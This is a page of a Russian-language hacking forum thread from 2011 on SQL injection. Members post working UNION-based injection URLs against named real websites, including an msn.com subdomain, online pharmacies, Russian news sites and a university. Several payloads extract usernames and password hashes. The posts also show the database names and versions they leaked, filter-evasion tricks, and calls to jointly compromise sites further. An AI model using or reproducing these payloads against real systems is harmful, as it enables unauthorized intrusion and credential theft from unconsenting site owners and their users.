HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 1454 из 1604 « Первая < 454954135414041444 1450 1451 1452 1453 1454 1455 1456 1457 1458 146415041554 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #14531  
Старый 06.12.2011, 23:47
Osstudio
Guest
Сообщений: n/a
Провел на форуме:
149611

Репутация: 81
По умолчанию
Поддомен msn.com

URL:

Код:
Code:
http://recettes.styledevie.ca.msn.com/forum/message.php?id=292963+and+1=0+union+select+1,2,3,4,group_concat%28concat_ws%280x3a3a3a,password,pseudonyme%29+separator+0x0b%29,6,7,8,9,10,11+from+membres+WHERE+pseudonyme=%27Hope%27+limit+0,20--
Database: recettes

Version MySQL: 5.1.38-community-log

User: recettes@mtl2tcesxweb16.tcm.int

Сначала скуль была под грифом "Top Secret", теперь, думаю могу её запостить!

-----------------------------------------------------------------------------

URL:

Код:
Code:
http://crimeahouse.net/doska/ind.php?id_typ=-6+union+/*!select*/+1,2,3,4,5,6,%28/*!select*/%28@x%29from%28/*!select*/%28@x:=0x00%29,%28/*!select*/%28null%29from%28information_schema./*!columns*/%29where%28table_schema!=0x696e666f726d6174696f6e5f736368656d61%29and%280x00%29in%28@x:=/*!concat%28@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name%29*/%29%29%29x%29,8,9,10,11,12,13,14,15,16,17,18,19,20+--+
Database: crimeaho_doska

Version MySQL: 5.0.92-community

User: crimeaho_admin@localhost

тИЦ: 10

PR: 1

-----------------------------------------------------------------------------

URL:

Код:
Code:
http://www.totalmma.ru/biography.php?id=2+and+1=0+union+select+1,concat_ws%280x3a3a3a,user%28%29,database%28%29,version%28%29%29--
Database: fightn_mma

Version MySQL: 5.1.56

User: fightn@localhost

тИЦ: 0

PR: 1

P.S Шелл лил не через скулю
 
Ответить с цитированием

  #14532  
Старый 07.12.2011, 12:19
stepashka_
Познавший АНТИЧАТ
Регистрация: 09.11.2009
Сообщений: 1,077
Провел на форуме:
7879791

Репутация: 265


Отправить сообщение для stepashka_ с помощью ICQ
По умолчанию
Цитата:
Сообщение от None  
http://allmedsnow.biz/index.php?sectiune=5&lang=ru&id_categ=-41+union+select+1,table_name,3,4+from+information_ schema.tables+limit+22,1+--+
ещё один шоп))
 
Ответить с цитированием

  #14533  
Старый 07.12.2011, 14:00
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию
ВИАГРА + сюприз

№1

Код HTML:
HTML:
http://acomplia.viagranow.eu/getdata.php?id=1+union+select+version(),2--+f
№2

Код HTML:
HTML:
http://online-viagranow.com/getdata.php?id=1+union+select+version(),2--+f
№3

Код HTML:
HTML:
http://reductil-meridia.biz/getdata.php?id=1+union+select+version(),2--+f
№4

Код HTML:
HTML:
http://viagra-freeonline.biz/getdata.php?id=1+union+select+version(),2--+f
№5

Код HTML:
HTML:
http://viagranow.biz/getdata.php?id=1+union+select+version(),2--+f
№6

Код HTML:
HTML:
http://www.meds4u.eu/getdata.php?id=1+union+select+version(),2--+f
№7

Код HTML:
HTML:
http://www.viagra-4u.com/getdata.php?id=1+union+select+version(),2--+f
№8

Код HTML:
HTML:
http://www.viagra-enligne.com/getdata.php?id=1+union+select+version(),2--+f
А вот и сюприз. Все сайты на одном сервере, по следам stepaska_
 
Ответить с цитированием

  #14534  
Старый 07.12.2011, 23:07
AC//DC
Познающий
Регистрация: 28.07.2009
Сообщений: 98
Провел на форуме:
247684

Репутация: 136
По умолчанию
http://www.show.ru/



http://www.show.ru/index.php?cat=247&eventId=-46589%20and%201=2%20union%20select%20concat_ws(cha r(58),@@version,user(),database(),@@version_compil e_os)+--

5.0.77-log admin_beta@83.222.2.225 admin_beta redhat-linux-gn

если кому не лень.....добивайте....http://www.show.ru/index.php?cat=247&eventId=-46589%20and%201=2%20union%20select%20table_name+fr om%20information_schema.tables%20limit%2017524,1--
 
Ответить с цитированием

  #14535  
Старый 08.12.2011, 15:06
Pirotexnik
Guest
Сообщений: n/a
Провел на форуме:
97332

Репутация: 38
По умолчанию
офф сайт СMS

Код:
Code:
http://www.jasawebsitemurah.info/cms/view.php?idArtikel=1+union+select+1,2,3,concat_ws(0x3a,username,password),5,6,7,8+from+jasaweb_cms.user+limit+0,1+--+
пароли/хеши нельзя выкладывать
 
Ответить с цитированием

  #14536  
Старый 09.12.2011, 13:44
Pirotexnik
Guest
Сообщений: n/a
Провел на форуме:
97332

Репутация: 38
По умолчанию
Код:
Code:
http://student.d3ti.mipa.uns.ac.id/arkan/view.php?idArtikel=-19+union+select+1,2,concat_ws(%200x3a,username,password),4,5,6,7,8+from+user+limit+0,1+--+
 
Ответить с цитированием

  #14537  
Старый 09.12.2011, 22:22
aydin-ka
Новичок
Регистрация: 03.05.2009
Сообщений: 7
Провел на форуме:
102906

Репутация: -14
По умолчанию
тИЦ 100

Код:
Code:
http://fortland.ru/index.html?action=news&act=news_p&id=99999999/*--*/UnIoN/*--*/SeleCt/*--*/1,@@version,3,4,5,6,7,8--
P.S: через несколько секунд "выбрасывает" на другую страницу....

Код:
Code:
http://fortland.ru/index.html?action=news&act=news_p&id=99999999/*--*/UnIoN/*--*/SeleCt/*--*/1,group_concat%28TABLE_NAME%29,3,4,5,6,7,8/*--*/FrOm/*--*/INFORMATION_SCHEMA.TABLES--+
 
Ответить с цитированием

  #14538  
Старый 10.12.2011, 02:06
cylaaaan
Участник форума
Регистрация: 31.08.2006
Сообщений: 149
Провел на форуме:
1763379

Репутация: 155
Отправить сообщение для cylaaaan с помощью ICQ
По умолчанию
Тиц 70

Цитата:
Сообщение от None  
http://www.open-pasport.ru/dop_infa.php?pid=-1+UnIoN+seLEct+1,2,3--
Тиц 1500

www.iteam.ru

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.iteam.ru/articles.php?pid=1&tid=2&sid=16&id=-131/**/UnION/**/SeLEcT/**/1,2,UNHEX(HEX(version())),4,5,6,7--[/COLOR][/COLOR] 
Тиц 210

www.ndelo.ru

Код:
Code:
http://www.ndelo.ru/survey.php?qid=241+union+select+1,2,3,4,5,6,7,8,9,10,11--&r=0.19475362145586483
Давайте вместе раскрутим эту скулю, фильтруется слово select
 
Ответить с цитированием

  #14539  
Старый 10.12.2011, 06:52
Pirotexnik
Guest
Сообщений: n/a
Провел на форуме:
97332

Репутация: 38
По умолчанию
Цитата:
Сообщение от cylaaaan  
cylaaaan said:
Давайте вместе раскрутим эту скулю, фильтруется слово select
Я могу ошибатся, но помоему не выйдет. Долбался с таким методом защиты, он все запросы приводит к нижнему регистру и сверяет ключами. Если там есть структуры типа +select - отсекается запрос. Надежда только на другие запросы, т.к. фильтруют в основном get\post.

Попробуй кук\хедер. Я не дома, попробовать не выйдет
 
Ответить с цитированием

  #14540  
Старый 10.12.2011, 11:06
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию
Цитата:
Сообщение от cylaaaan  
cylaaaan said:
Тиц 70
Давайте вместе раскрутим эту скулю, фильтруется слово select
Кроме blind вариантов не вижу...

database():ndelo_bases
 
Ответить с цитированием
Ответ
Страница 1454 из 1604 « Первая < 454954135414041444 1450 1451 1452 1453 1454 1455 1456 1457 1458 146415041554 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ